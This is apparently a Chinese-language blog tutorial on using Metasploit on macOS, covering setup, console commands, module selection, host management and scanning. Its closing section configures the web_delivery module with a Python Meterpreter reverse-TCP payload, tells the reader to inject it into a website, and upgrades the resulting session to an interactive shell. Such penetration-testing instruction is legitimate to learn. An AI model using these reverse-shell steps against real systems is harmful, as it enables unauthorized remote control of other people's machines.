Skip to main content
  1. Posts/
  2. sec/

基于MacOS的metasploit不完全指南

·241 words·2 mins· loading
MAC Msf
bu44er
Author
bu44er
Table of Contents

基础
#

配置
#

vim ~/.zshrc
export PATH="$PATH:/opt/metasploit-framework/bin"
source ~/.zshrc

# 数据库
sudo apt install postgresql postgresql-contrib

msf文件系统:/opt/metasploit-framework/embedded/framework


基本命令
#

# 控制台
msfconsole

# 更新
msfupdate

# 显示所有可用选项
show -h

# 显示所有可用辅助模块(扫描器)
show auxiliary

# 加载插件
load xx
  • 可以执行 shell 指令,或者 /bin/bash -i 启动交互式 shell

变量操作
#

msf 中使用 datastore 以键值对的形式存放变量。

  • 变量不区分大小写
# 局部datastore模块
# set get
msf44 > set host 223.123.123.123
host => 223.123.123.123
msf44 > get host
host => 223.123.123.123

# 全局datastore
setg getg

# 删除
unset unsetg

# 显示所有datastore中的变量
set

模块
#

# 选择模块
use auxiliary/scanner/smb/smb_version

# 可用选项
show options

# 高级选项
show advanced

# 绕过选项
show evasion

# 检测缺少的选项
show missing

# 可用的payloads
show payloads

# 运行
run/exploit

# 退出
back

# 搜索
search windows exploit 2018
# 可选参数 
# platform:windows type:exploit cve:2018

管理主机
#

# 查看所有主机
hosts

# 添加新主机
hosts -a <IP>

# 删除主机
hosts -d <IP>

# 查看主机上的服务
services [<IP>]

# 指定端口
services -a <IP> -p <PORT>

扫描
#

nmap
#

db_nmap <IP> --open 

模块
#

web delivery
#

  • payload 生成
  • 可以生成各种语言的反弹shell的payload
use exploit/multi/script/web_delivery

This exploit becomes a very useful tool when the attacker has some control of the system, but does not possess a full shell.

设置 target:

show targets
# 选一个
set target x

设置 payload:

set PAYLOAD python/meterpreter/reverse_tcp

设置 lhost:

set lhost 192.168.64.1

得到的 payload 要先 URL 编码再输入!!!

paylaod 传入网站之后,msf 查看会话:

sessions -i

  • session -i 命令用于与已经建立的会话进行交互。
  • -i 1 是指第一个 session

输入shell进入shell:

后续可以通过 python 命令转成传统 shell:

python -c 'import pty;pty.spawn("/bin/bash")'

感觉不如直接 python 反弹shell到本机…..